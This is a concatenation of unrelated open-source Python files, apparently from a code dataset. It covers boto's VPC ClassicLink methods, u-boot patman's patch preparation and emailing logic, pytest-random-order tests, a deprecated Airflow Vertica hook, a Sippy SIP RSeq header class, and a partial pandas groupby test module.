self.instance_tenancy = value
elif name == 'classicLinkEnabled':
self.classic_link_enabled = value
else:
setattr(self, name, value)
def delete(self):
return self.connection.delete_vpc(self.id)
def _update(self, updated):
self.__dict__.update(updated.__dict__)
def _get_status_then_update_vpc(self, get_status_method, validate=False,
dry_run=False):
vpc_list = get_status_method(
[self.id],
dry_run=dry_run
)
if len(vpc_list):
updated_vpc = vpc_list[0]
self._update(updated_vpc)
elif validate:
raise ValueError('%s is not a valid VPC ID' % (self.id,))
def update(self, validate=False, dry_run=False):
self._get_status_then_update_vpc(
self.connection.get_all_vpcs,
validate=validate,
dry_run=dry_run
)
return self.state
def update_classic_link_enabled(self, validate=False, dry_run=False):
"""
Updates instance's classic_link_enabled attribute
:rtype: bool
:return: self.classic_link_enabled after update has occurred.
"""
self._get_status_then_update_vpc(
self.connection.get_all_classic_link_vpcs,
validate=validate,
dry_run=dry_run
)
return self.classic_link_enabled
def disable_classic_link(self, dry_run=False):
"""
Disables ClassicLink for a VPC. You cannot disable ClassicLink for a
VPC that has EC2-Classic instances linked to it.
:type dry_run: bool
:param dry_run: Set to True if the operation should not actually run.
:rtype: bool
:return: True if successful
"""
return self.connection.disable_vpc_classic_link(self.id,
dry_run=dry_run)
def enable_classic_link(self, dry_run=False):
"""
Enables a VPC for ClassicLink. You can then link EC2-Classic instances
to your ClassicLink-enabled VPC to allow communication over private IP
addresses. You cannot enable your VPC for ClassicLink if any of your
VPC's route tables have existing routes for address ranges within the
10.0.0.0/8 IP address range, excluding local routes for VPCs in the
10.0.0.0/16 and 10.1.0.0/16 IP address ranges.
:type dry_run: bool
:param dry_run: Set to True if the operation should not actually run.
:rtype: bool
:return: True if successful
"""
return self.connection.enable_vpc_classic_link(self.id,
dry_run=dry_run)
def attach_classic_instance(self, instance_id, groups, dry_run=False):
"""
Links an EC2-Classic instance to a ClassicLink-enabled VPC through one
or more of the VPC's security groups. You cannot link an EC2-Classic
instance to more than one VPC at a time. You can only link an instance
that's in the running state. An instance is automatically unlinked from
a VPC when it's stopped. You can link it to the VPC again when you
restart it.
After you've linked an instance, you cannot change the VPC security
groups that are associated with it. To change the security groups, you
must first unlink the instance, and then link it again.
Linking your instance to a VPC is sometimes referred to as attaching
your instance.
:type intance_id: str
:param instance_is: The ID of a ClassicLink-enabled VPC.
:tye groups: list
:param groups: The ID of one or more of the VPC's security groups.
You cannot specify security groups from a different VPC. The
members of the list can be
:class:`boto.ec2.securitygroup.SecurityGroup` objects or
strings of the id's of the security groups.
:type dry_run: bool
:param dry_run: Set to True if the operation should not actually run.
:rtype: bool
:return: True if successful
"""
return self.connection.attach_classic_link_vpc(
vpc_id=self.id,
instance_id=instance_id,
groups=groups,
dry_run=dry_run
)
def detach_classic_instance(self, instance_id, dry_run=False):
"""
Unlinks a linked EC2-Classic instance from a VPC. After the instance
has been unlinked, the VPC security groups are no longer associated
with it. An instance is automatically unlinked from a VPC when
it's stopped.
:type intance_id: str
:param instance_is: The ID of the VPC to which the instance is linked.
:type dry_run: bool
:param dry_run: Set to True if the operation should not actually run.
:rtype: bool
:return: True if successful
"""
return self.connection.detach_classic_link_vpc(
vpc_id=self.id,
instance_id=instance_id,
dry_run=dry_run
)
| bsd-3-clause |
Stane1983/u-boot | tools/patman/control.py | 2 | 9562 | # SPDX-License-Identifier: GPL-2.0+
#
# Copyright 2020 Google LLC
#
"""Handles the main control logic of patman
This module provides various functions called by the main program to implement
the features of patman.
"""
import os
import sys
from patman import checkpatch
from patman import gitutil
from patman import patchstream
from patman import terminal
def setup():
"""Do required setup before doing anything"""
gitutil.Setup()
def prepare_patches(col, branch, count, start, end, ignore_binary):
"""Figure out what patches to generate, then generate them
The patch files are written to the current directory, e.g. 0001_xxx.patch
0002_yyy.patch
Args:
col (terminal.Color): Colour output object
branch (str): Branch to create patches from (None = current)
count (int): Number of patches to produce, or -1 to produce patches for
the current branch back to the upstream commit
start (int): Start partch to use (0=first / top of branch)
end (int): End patch to use (0=last one in series, 1=one before that,
etc.)
ignore_binary (bool): Don't generate patches for binary files
Returns:
Tuple:
Series object for this series (set of patches)
Filename of the cover letter as a string (None if none)
patch_files: List of patch filenames, each a string, e.g.
['0001_xxx.patch', '0002_yyy.patch']
"""
if count == -1:
# Work out how many patches to send if we can
count = (gitutil.CountCommitsToBranch(branch) - start)
if not count:
str = 'No commits found to process - please use -c flag, or run:\n' \
' git branch --set-upstream-to remote/branch'
sys.exit(col.Color(col.RED, str))
# Read the metadata from the commits
to_do = count - end
series = patchstream.get_metadata(branch, start, to_do)
cover_fname, patch_files = gitutil.CreatePatches(
branch, start, to_do, ignore_binary, series)
# Fix up the patch files to our liking, and insert the cover letter
patchstream.fix_patches(series, patch_files)
if cover_fname and series.get('cover'):
patchstream.insert_cover_letter(cover_fname, series, to_do)
return series, cover_fname, patch_files
def check_patches(series, patch_files, run_checkpatch, verbose):
"""Run some checks on a set of patches
This santiy-checks the patman tags like Series-version and runs the patches
through checkpatch
Args:
series (Series): Series object for this series (set of patches)
patch_files (list): List of patch filenames, each a string, e.g.
['0001_xxx.patch', '0002_yyy.patch']
run_checkpatch (bool): True to run checkpatch.pl
verbose (bool): True to print out every line of the checkpatch output as
it is parsed
Returns:
bool: True if the patches had no errors, False if they did
"""
# Do a few checks on the series
series.DoChecks()
# Check the patches, and run them through 'git am' just to be sure
if run_checkpatch:
ok = checkpatch.CheckPatches(verbose, patch_files)
else:
ok = True
return ok
def email_patches(col, series, cover_fname, patch_files, process_tags, its_a_go,
ignore_bad_tags, add_maintainers, limit, dry_run, in_reply_to,
thread, smtp_server):
"""Email patches to the recipients
This emails out the patches and cover letter using 'git send-email'. Each
patch is copied to recipients identified by the patch tag and output from
the get_maintainer.pl script. The cover letter is copied to all recipients
of any patch.
To make this work a CC file is created holding the recipients for each patch
and the cover letter. See the main program 'cc_cmd' for this logic.
Args:
col (terminal.Color): Colour output object
series (Series): Series object for this series (set of patches)
cover_fname (str): Filename of the cover letter as a string (None if
none)
patch_files (list): List of patch filenames, each a string, e.g.
['0001_xxx.patch', '0002_yyy.patch']
process_tags (bool): True to process subject tags in each patch, e.g.
for 'dm: spi: Add SPI support' this would be 'dm' and 'spi'. The
tags are looked up in the configured sendemail.aliasesfile and also
in ~/.patman (see README)
its_a_go (bool): True if we are going to actually send the patches,
False if the patches have errors and will not be sent unless
@ignore_errors
ignore_bad_tags (bool): True to just print a warning for unknown tags,
False to halt with an error
add_maintainers (bool): Run the get_maintainer.pl script for each patch
limit (int): Limit on the number of people that can be cc'd on a single
patch or the cover letter (None if no limit)
dry_run (bool): Don't actually email the patches, just print out what
would be sent
in_reply_to (str): If not None we'll pass this to git as --in-reply-to.
Should be a message ID that this is in reply to.
thread (bool): True to add --thread to git send-email (make all patches
reply to cover-letter or first patch in series)
smtp_server (str): SMTP server to use to send patches (None for default)
"""
cc_file = series.MakeCcFile(process_tags, cover_fname, not ignore_bad_tags,
add_maintainers, limit)
# Email the patches out (giving the user time to check / cancel)
cmd = ''
if its_a_go:
cmd = gitutil.EmailPatches(
series, cover_fname, patch_files, dry_run, not ignore_bad_tags,
cc_file, in_reply_to=in_reply_to, thread=thread,
smtp_server=smtp_server)
else:
print(col.Color(col.RED, "Not sending emails due to errors/warnings"))
# For a dry run, just show our actions as a sanity check
if dry_run:
series.ShowActions(patch_files, cmd, process_tags)
if not its_a_go:
print(col.Color(col.RED, "Email would not be sent"))
os.remove(cc_file)
def send(args):
"""Create, check and send patches by email
Args:
args (argparse.Namespace): Arguments to patman
"""
setup()
col = terminal.Color()
series, cover_fname, patch_files = prepare_patches(
col, args.branch, args.count, args.start, args.end,
args.ignore_binary)
ok = check_patches(series, patch_files, args.check_patch,
args.verbose)
ok = ok and gitutil.CheckSuppressCCConfig()
its_a_go = ok or args.ignore_errors
email_patches(
col, series, cover_fname, patch_files, args.process_tags,
its_a_go, args.ignore_bad_tags, args.add_maintainers,
args.limit, args.dry_run, args.in_reply_to, args.thread,
args.smtp_server)
def patchwork_status(branch, count, start, end, dest_branch, force,
show_comments, url):
"""Check the status of patches in patchwork
This finds the series in patchwork using the Series-link tag, checks for new
comments and review tags, displays then and creates a new branch with the
review tags.
Args:
branch (str): Branch to create patches from (None = current)
count (int): Number of patches to produce, or -1 to produce patches for
the current branch back to the upstream commit
start (int): Start partch to use (0=first / top of branch)
end (int): End patch to use (0=last one in series, 1=one before that,
etc.)
dest_branch (str): Name of new branch to create with the updated tags
(None to not create a branch)
force (bool): With dest_branch, force overwriting an existing branch
show_comments (bool): True to display snippets from the comments
provided by reviewers
url (str): URL of patchwork server, e.g. 'https://patchwork.ozlabs.org'.
This is ignored if the series provides a Series-patchwork-url tag.
Raises:
ValueError: if the branch has no Series-link value
"""
if count == -1:
# Work out how many patches to send if we can
count = (gitutil.CountCommitsToBranch(branch) - start)
series = patchstream.get_metadata(branch, start, count - end)
warnings = 0
for cmt in series.commits:
if cmt.warn:
print('%d warnings for %s:' % (len(cmt.warn), cmt.hash))
for warn in cmt.warn:
print('\t', warn)
warnings += 1
print
if warnings:
raise ValueError('Please fix warnings before running status')
links = series.get('links')
if not links:
raise ValueError("Branch has no Series-links value")
# Find the link without a version number (we don't support versions yet)
found = [link for link in links.split() if not ':' in link]
if not found:
raise ValueError('Series-links has no current version (without :)')
# Allow the series to override the URL
if 'patchwork_url' in series:
url = series.patchwork_url
# Import this here to avoid failing on other commands if the dependencies
# are not present
from patman import status
status.check_patchwork_status(series, found[0], branch, dest_branch, force,
show_comments, url)
| gpl-2.0 |
jbasko/pytest-random-order | tests/test_actual_test_runs.py | 1 | 7179 | # -*- coding: utf-8 -*-
import collections
import re
import py
import pytest
@pytest.fixture
def tmp_tree_of_tests(testdir):
"""
Creates a directory structure:
tmpdir/
shallow_tests/
test_a.py 2 passing, 1 failing
deep_tests/
test_b.py 2 passing, 1 failing
test_c.py 1 passing
test_d.py 2 passing
test_e.py a class, 2 passing, 1 failing
If module name doesn't start with "test_", it isn't picked up by runpytest.
"""
sup = testdir.mkpydir('shallow_tests')
sup.join('test_a.py').write(py.code.Source("""
def test_a1():
assert False
def test_a2():
assert True
def test_a3():
assert True
"""))
sup.join('test_ax.py').write(py.code.Source("""
def test_ax1():
assert True
def test_ax2():
assert True
def test_ax3():
assert True
"""))
sub = testdir.mkpydir('shallow_tests/deep_tests')
sub.join('test_b.py').write(py.code.Source("""
def test_b1():
assert True
def test_b2():
assert False
def test_b3():
assert True
"""))
sub.join('test_c.py').write(py.code.Source("""
def test_c1():
assert True
"""))
sub.join('test_d.py').write(py.code.Source("""
def test_d1():
assert True
def test_d2():
assert True
"""))
sub.join('test_e.py').write(py.code.Source("""
from unittest import TestCase
class EeTest(TestCase):
def test_ee1(self):
self.assertTrue(True)
def test_ee2(self):
self.assertFalse(True)
def test_ee3(self):
self.assertTrue(True)
class ExTest(TestCase):
def test_ex1(self):
self.assertTrue(True)
def test_ex2(self):
self.assertTrue(True)
"""))
return testdir
def check_call_sequence(seq, bucket='module'):
all_values = collections.defaultdict(list)
num_switches = collections.defaultdict(int)
def inspect_attr(this_call, prev_call, attr_name):
attr_value = getattr(this_call, attr_name)
prev_value = getattr(prev_call, attr_name) if prev_call else -1
all_values[attr_name].append(attr_value)
if attr_value != prev_value:
num_switches[attr_name] += 1
for i, this_call in enumerate(seq):
prev_call = seq[i - 1] if i > 0 else None
inspect_attr(this_call, prev_call, 'package')
inspect_attr(this_call, prev_call, 'module')
inspect_attr(this_call, prev_call, 'cls')
num_packages = len(set(all_values['package']))
num_package_switches = num_switches['package']
num_modules = len(set(all_values['module']))
num_module_switches = num_switches['module']
num_classes = len(set(all_values['class']))
num_class_switches = num_switches['class']
# These are just sanity tests, the actual shuffling is tested in test_shuffle,
# assertions here are very relaxed.
if bucket == 'global':
if num_module_switches <= num_modules:
pytest.fail('Too few module switches for global shuffling')
if num_package_switches <= num_packages:
pytest.fail('Too few package switches for global shuffling')
elif bucket == 'package':
assert num_package_switches == num_packages
if num_module_switches <= num_modules:
pytest.fail('Too few module switches for package-limited shuffling')
elif bucket == 'module':
assert num_module_switches == num_modules
elif bucket == 'class':
# Each class can contribute to 1 or 2 switches.
assert num_class_switches <= num_classes * 2
# Class bucket is a special case of module bucket.
# We have two classes in one module and these could be reshuffled so
# the module could appear in sequence of buckets two times.
assert num_modules <= num_module_switches <= num_modules + 1
@pytest.mark.parametrize('bucket,min_sequences,max_sequences', [
('class', 2, 5),
('module', 2, 5),
('package', 2, 5),
('global', 2, 5),
('none', 1, 1),
('parent', 1, 5),
('grandparent', 1, 5),
])
def test_it_works_with_actual_tests(tmp_tree_of_tests, get_test_calls, bucket, min_sequences, max_sequences):
sequences = set()
for x in range(5):
result = tmp_tree_of_tests.runpytest('--random-order-bucket={0}'.format(bucket), '--verbose')
result.assert_outcomes(passed=14, failed=3)
seq = get_test_calls(result)
check_call_sequence(seq, bucket=bucket)
assert len(seq) == 17
sequences.add(seq)
assert min_sequences <= len(sequences) <= max_sequences
def test_random_order_seed_is_respected(testdir, twenty_tests, get_test_calls):
testdir.makepyfile(twenty_tests)
call_sequences = {
'1': None,
'2': None,
'3': None,
}
for seed in call_sequences.keys():
result = testdir.runpytest('--random-order-seed={0}'.format(seed))
result.stdout.fnmatch_lines([
'*Using --random-order-seed={0}*'.format(seed),
])
result.assert_outcomes(passed=20)
call_sequences[seed] = get_test_calls(result)
for seed in call_sequences.keys():
result = testdir.runpytest('--random-order-seed={0}'.format(seed))
result.assert_outcomes(passed=20)
assert call_sequences[seed] == get_test_calls(result)
assert call_sequences['1'] != call_sequences['2'] != call_sequences['3']
def test_generated_seed_is_reported_and_run_can_be_reproduced(testdir, twenty_tests, get_test_calls):
testdir.makepyfile(twenty_tests)
result = testdir.runpytest('-v', '--random-order')
result.assert_outcomes(passed=20)
result.stdout.fnmatch_lines([
'*Using --random-order-seed=*'
])
calls = get_test_calls(result)
# find the seed in output
seed = None
for line in result.outlines:
g = re.match('^Using --random-order-seed=(.+)$', line)
if g:
seed = g.group(1)
break
assert seed
result2 = testdir.runpytest('-v', '--random-order-seed={0}'.format(seed))
result2.assert_outcomes(passed=20)
calls2 = get_test_calls(result2)
assert calls == calls2
@pytest.mark.parametrize('bucket', [
'global',
'package',
'module',
'class',
'parent',
'grandparent',
'none',
])
def test_failed_first(tmp_tree_of_tests, get_test_calls, bucket):
result1 = tmp_tree_of_tests.runpytest('--random-order-bucket={0}'.format(bucket), '--verbose')
result1.assert_outcomes(passed=14, failed=3)
result2 = tmp_tree_of_tests.runpytest('--random-order-bucket={0}'.format(bucket), '--failed-first', '--verbose')
result2.assert_outcomes(passed=14, failed=3)
calls2 = get_test_calls(result2)
first_three_tests = set(c.name for c in calls2[:3])
assert set(['test_a1', 'test_b2', 'test_ee2']) == first_three_tests
| mit |
wileeam/airflow | airflow/contrib/hooks/vertica_hook.py | 5 | 1139 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module is deprecated. Please use `airflow.providers.vertica.hooks.vertica`."""
import warnings
# pylint: disable=unused-import
from airflow.providers.vertica.hooks.vertica import VerticaHook # noqa
warnings.warn(
"This module is deprecated. Please use `airflow.providers.vertica.hooks.vertica`.",
DeprecationWarning, stacklevel=2
)
| apache-2.0 |
AVOXI/b2bua | sippy/SipRSeq.py | 2 | 1760 | # Copyright (c) 2015 Sippy Software, Inc. All rights reserved.
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from SipNumericHF import SipNumericHF
class SipRSeq(SipNumericHF):
hf_names = ('rseq',)
def __init__(self, body = None, number = 1):
SipNumericHF.__init__(self, body, number)
def getCanName(self, name, compact = False):
return 'RSeq'
if __name__ == '__main__':
rs = SipRSeq(body = '50')
rs.parse()
print rs.number
rs.number = 100
print str(rs)
| bsd-2-clause |
GuessWhoSamFoo/pandas | pandas/tests/groupby/test_function.py | 1 | 38953 | from string import ascii_lowercase
import numpy as np
import pytest
from pandas.compat import product as cart_product
from pandas.errors import UnsupportedFunctionCall
import pandas as pd
from pandas import (
DataFrame, Index, MultiIndex, Series, Timestamp, compat, date_range, isna)
import pandas.core.nanops as nanops
from pandas.util import testing as tm
@pytest.mark.parametrize("agg_func", ['any', 'all'])
@pytest.mark.parametrize("skipna", [True, False])
@pytest.mark.parametrize("vals", [
['foo', 'bar', 'baz'], ['foo', '', ''], ['', '', ''],
[1, 2, 3], [1, 0, 0], [0, 0, 0],
[1., 2., 3.], [1., 0., 0.], [0., 0., 0.],
[True, True, True], [True, False, False], [False, False, False],
[np.nan, np.nan, np.nan]
])
def test_groupby_bool_aggs(agg_func, skipna, vals):
df = DataFrame({'key': ['a'] * 3 + ['b'] * 3, 'val': vals * 2})
# Figure out expectation using Python builtin
exp = getattr(compat.builtins, agg_func)(vals)
# edge case for missing data with skipna and 'any'
if skipna and all(isna(vals)) and agg_func == 'any':
exp = False
exp_df = DataFrame([exp] * 2, columns=['val'], index=Index(
['a', 'b'], name='key'))
result = getattr(df.groupby('key'), agg_func)(skipna=skipna)
tm.assert_frame_equal(result, exp_df)
def test_max_min_non_numeric():
# #2700
aa = DataFrame({'nn': [11, 11, 22, 22],
'ii': [1, 2, 3, 4],
'ss': 4 * ['mama']})
result = aa.groupby('nn').max()
assert 'ss' in result
result = aa.groupby('nn').max(numeric_only=False)
assert 'ss' in result
result = aa.groupby('nn').min()
assert 'ss' in result
result = aa.groupby('nn').min(numeric_only=False)
assert 'ss' in result
def test_intercept_builtin_sum():
s = Series([1., 2., np.nan, 3.])
grouped = s.groupby([0, 1, 2, 2])
result = grouped.agg(compat.builtins.sum)
result2 = grouped.apply(compat.builtins.sum)
expected = grouped.sum()
tm.assert_series_equal(result, expected)
tm.assert_series_equal(result2, expected)
# @pytest.mark.parametrize("f", [max, min, sum])
# def test_builtins_apply(f):
@pytest.mark.parametrize("f", [max, min, sum])
@pytest.mark.parametrize('keys', [
"jim", # Single key
["jim", "joe"] # Multi-key
])
def test_builtins_apply(keys, f):
# see gh-8155
df = pd.DataFrame(np.random.randint(1, 50, (1000, 2)),
columns=["jim", "joe"])
df["jolie"] = np.random.randn(1000)
fname = f.__name__
result = df.groupby(keys).apply(f)
ngroups = len(df.drop_duplicates(subset=keys))
assert_msg = ("invalid frame shape: {} "
"(expected ({}, 3))".format(result.shape, ngroups))
assert result.shape == (ngroups, 3), assert_msg
tm.assert_frame_equal(result, # numpy's equivalent function
df.groupby(keys).apply(getattr(np, fname)))
if f != sum:
expected = df.groupby(keys).agg(fname).reset_index()
expected.set_index(keys, inplace=True, drop=False)
tm.assert_frame_equal(result, expected, check_dtype=False)
tm.assert_series_equal(getattr(result, fname)(),
getattr(df, fname)())
def test_arg_passthru():
# make sure that we are passing thru kwargs
# to our agg functions
# GH3668
# GH5724
df = pd.DataFrame(
{'group': [1, 1, 2],
'int': [1, 2, 3],
'float': [4., 5., 6.],
'string': list('abc'),
'category_string': pd.Series(list('abc')).astype('category'),
'category_int': [7, 8, 9],
'datetime': pd.date_range('20130101', periods=3),
'datetimetz': pd.date_range('20130101',
periods=3,
tz='US/Eastern'),
'timedelta': pd.timedelta_range('1 s', periods=3, freq='s')},
columns=['group', 'int', 'float', 'string',
'category_string', 'category_int',
'datetime', 'datetimetz',
'timedelta'])
expected_columns_numeric = Index(['int', 'float', 'category_int'])
# mean / median
expected = pd.DataFrame(
{'category_int': [7.5, 9],
'float': [4.5, 6.],
'timedelta': [pd.Timedelta('1.5s'),
pd.Timedelta('3s')],
'int': [1.5, 3],
'datetime': [pd.Timestamp('2013-01-01 12:00:00'),
pd.Timestamp('2013-01-03 00:00:00')],
'datetimetz': [
pd.Timestamp('2013-01-01 12:00:00', tz='US/Eastern'),
pd.Timestamp('2013-01-03 00:00:00', tz='US/Eastern')]},
index=Index([1, 2], name='group'),
columns=['int', 'float', 'category_int',
'datetime', 'datetimetz', 'timedelta'])
for attr in ['mean', 'median']:
f = getattr(df.groupby('group'), attr)
result = f()
tm.assert_index_equal(result.columns, expected_columns_numeric)
result = f(numeric_only=False)
tm.assert_frame_equal(result.reindex_like(expected), expected)
# TODO: min, max *should* handle
# categorical (ordered) dtype
expected_columns = Index(['int', 'float', 'string',
'category_int',
'datetime', 'datetimetz',
'timedelta'])
for attr in ['min', 'max']:
f = getattr(df.groupby('group'), attr)
result = f()
tm.assert_index_equal(result.columns, expected_columns)
result = f(numeric_only=False)
tm.assert_index_equal(result.columns, expected_columns)
expected_columns = Index(['int', 'float', 'string',
'category_string', 'category_int',
'datetime', 'datetimetz',
'timedelta'])
for attr in ['first', 'last']:
f = getattr(df.groupby('group'), attr)
result = f()
tm.assert_index_equal(result.columns, expected_columns)
result = f(numeric_only=False)
tm.assert_index_equal(result.columns, expected_columns)
expected_columns = Index(['int', 'float', 'string',
'category_int', 'timedelta'])
for attr in ['sum']:
f = getattr(df.groupby('group'), attr)
result = f()
tm.assert_index_equal(result.columns, expected_columns_numeric)
result = f(numeric_only=False)
tm.assert_index_equal(result.columns, expected_columns)
expected_columns = Index(['int', 'float', 'category_int'])
for attr in ['prod', 'cumprod']:
f = getattr(df.groupby('group'), attr)
result = f()
tm.assert_index_equal(result.columns, expected_columns_numeric)
result = f(numeric_only=False)
tm.assert_index_equal(result.columns, expected_columns)
# like min, max, but don't include strings
expected_columns = Index(['int', 'float',
'category_int',
'datetime', 'datetimetz',
'timedelta'])
for attr in ['cummin', 'cummax']:
f = getattr(df.groupby('group'), attr)
result = f()
# GH 15561: numeric_only=False set by default like min/max
tm.assert_index_equal(result.columns, expected_columns)
result = f(numeric_only=False)
tm.assert_index_equal(result.columns, expected_columns)
expected_columns = Index(['int', 'float', 'category_int',
'timedelta'])
for attr in ['cumsum']:
f = getattr(df.groupby('group'), attr)
result = f()
tm.assert_index_equal(result.columns, expected_columns_numeric)
result = f(numeric_only=False)
tm.assert_index_equal(result.columns, expected_columns)
def test_non_cython_api():
# GH5610
# non-cython calls should not include the grouper
df = DataFrame(
[[1, 2, 'foo'],
[1, np.nan, 'bar'],
[3, np.nan, 'baz']],
columns=['A', 'B', 'C'])
g = df.groupby('A')
gni = df.groupby('A', as_index=False)
# mad
expected = DataFrame([[0], [np.nan]], columns=['B'], index=[1, 3])
expected.index.name = 'A'
result = g.mad()
tm.assert_frame_equal(result, expected)
expected = DataFrame([[0., 0.], [0, np.nan]], columns=['A', 'B'],
index=[0, 1])
result = gni.mad()
tm.assert_frame_equal(result, expected)
# describe
expected_index = pd.Index([1, 3], name='A')
expected_col = pd.MultiIndex(levels=[['B'],
['count', 'mean', 'std', 'min',
'25%', '50%', '75%', 'max']],
codes=[[0] * 8, list(range(8))])
expected = pd.DataFrame([[1.0, 2.0, np.nan, 2.0, 2.0, 2.0, 2.0, 2.0],
[0.0, np.nan, np.nan, np.nan, np.nan, np.nan,
np.nan, np.nan]],
index=expected_index,
columns=expected_col)
result = g.describe()
tm.assert_frame_equal(result, expected)
expected = pd.concat([df[df.A == 1].describe().unstack().to_frame().T,
df[df.A == 3].describe().unstack().to_frame().T])
expected.index = pd.Index([0, 1])
result = gni.describe()
tm.assert_frame_equal(result, expected)
# any
expected = DataFrame([[True, True], [False, True]], columns=['B', 'C'],
index=[1, 3])
expected.index.name = 'A'
result = g.any()
tm.assert_frame_equal(result, expected)
# idxmax
expected = DataFrame([[0.0], [np.nan]], columns=['B'], index=[1, 3])
expected.index.name = 'A'
result = g.idxmax()
tm.assert_frame_equal(result, expected)
def test_cython_api2():
# this takes the fast apply path
# cumsum (GH5614)
df = DataFrame(
[[1, 2, np.nan], [1, np.nan, 9], [3, 4, 9]
], columns=['A', 'B', 'C'])
expected = DataFrame(
[[2, np.nan], [np.nan, 9], [4, 9]], columns=['B', 'C'])
result = df.groupby('A').cumsum()
tm.assert_frame_equal(result, expected)
# GH 5755 - cumsum is a transformer and should ignore as_index
result = df.groupby('A', as_index=False).cumsum()
tm.assert_frame_equal(result, expected)
# GH 13994
result = df.groupby('A').cumsum(axis=1)
expected = df.cumsum(axis=1)
tm.assert_frame_equal(result, expected)
result = df.groupby('A').cumprod(axis=1)
expected = df.cumprod(axis=1)
tm.assert_frame_equal(result, expected)
def test_cython_median():
df = DataFrame(np.random.randn(1000))
df.values[::2] = np.nan
labels = np.random.randint(0, 50, size=1000).astype(float)
labels[::17] = np.nan
result = df.groupby(labels).median()
exp = df.groupby(labels).agg(nanops.nanmedian)
tm.assert_frame_equal(result, exp)
df = DataFrame(np.random.randn(1000, 5))
rs = df.groupby(labels).agg(np.median)
xp = df.groupby(labels).median()
tm.assert_frame_equal(rs, xp)
def test_median_empty_bins(observed):
df = pd.DataFrame(np.random.randint(0, 44, 500))
grps = range(0, 55, 5)
bins = pd.cut(df[0], grps)
result = df.groupby(bins, observed=observed).median()
expected = df.groupby(bins, observed=observed).agg(lambda x: x.median())
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("dtype", [
'int8', 'int16', 'int32', 'int64', 'float32', 'float64'])
@pytest.mark.parametrize("method,data", [
('first', {'df': [{'a': 1, 'b': 1}, {'a': 2, 'b': 3}]}),
('last', {'df': [{'a': 1, 'b': 2}, {'a': 2, 'b': 4}]}),
('min', {'df': [{'a': 1, 'b': 1}, {'a': 2, 'b': 3}]}),
('max', {'df': [{'a': 1, 'b': 2}, {'a': 2, 'b': 4}]}),
('nth', {'df': [{'a': 1, 'b': 2}, {'a': 2, 'b': 4}],
'args': [1]}),
('count', {'df': [{'a': 1, 'b': 2}, {'a': 2, 'b': 2}],
'out_type': 'int64'})
])
def test_groupby_non_arithmetic_agg_types(dtype, method, data):
# GH9311, GH6620
df = pd.DataFrame(
[{'a': 1, 'b': 1},
{'a': 1, 'b': 2},
{'a': 2, 'b': 3},
{'a': 2, 'b': 4}])
df['b'] = df.b.astype(dtype)
if 'args' not in data:
data['args'] = []
if 'out_type' in data:
out_type = data['out_type']
else:
out_type = dtype
exp = data['df']
df_out = pd.DataFrame(exp)
df_out['b'] = df_out.b.astype(out_type)
df_out.set_index('a', inplace=True)
grpd = df.groupby('a')
t = getattr(grpd, method)(*data['args'])
tm.assert_frame_equal(t, df_out)
@pytest.mark.parametrize("i", [
(Timestamp("2011-01-15 12:50:28.502376"),
Timestamp("2011-01-20 12:50:28.593448")),
(24650000000000001, 24650000000000002)
])
def test_groupby_non_arithmetic_agg_int_like_precision(i):
# see gh-6620, gh-9311
df = pd.DataFrame([{"a": 1, "b": i[0]}, {"a": 1, "b": i[1]}])
grp_exp = {"first": {"expected": i[0]},
"last": {"expected": i[1]},
"min": {"expected": i[0]},
"max": {"expected": i[1]},
"nth": {"expected": i[1],
"args": [1]},
"count": {"expected": 2}}
for method, data in compat.iteritems(grp_exp):
if "args" not in data:
data["args"] = []
grouped = df.groupby("a")
res = getattr(grouped, method)(*data["args"])
assert res.iloc[0].b == data["expected"]
def test_fill_consistency():
# GH9221
# pass thru keyword arguments to the generated wrapper
# are set if the passed kw is None (only)
df = DataFrame(index=pd.MultiIndex.from_product(
[['value1', 'value2'], date_range('2014-01-01', '2014-01-06')]),
columns=Index(
['1', '2'], name='id'))
df['1'] = [np.nan, 1, np.nan, np.nan, 11, np.nan, np.nan, 2, np.nan,
np.nan, 22, np.nan]
df['2'] = [np.nan, 3, np.nan, np.nan, 33, np.nan, np.nan, 4, np.nan,
np.nan, 44, np.nan]
expected = df.groupby(level=0, axis=0).fillna(method='ffill')
result = df.T.groupby(level=0, axis=1).fillna(method='ffill').T
tm.assert_frame_equal(result, expected)
def test_groupby_cumprod():
# GH 4095
df = pd.DataFrame({'key': ['b'] * 10, 'value': 2})
actual = df.groupby('key')['value'].cumprod()
expected = df.groupby('key')['value'].apply(lambda x: x.cumprod())
expected.name = 'value'
tm.assert_series_equal(actual, expected)
df = pd.DataFrame({'key': ['b'] * 100, 'value': 2})
actual = df.groupby('key')['value'].cumprod()
# if overflows, groupby product casts to float
# while numpy passes back invalid values
df['value'] = df['value'].astype(float)
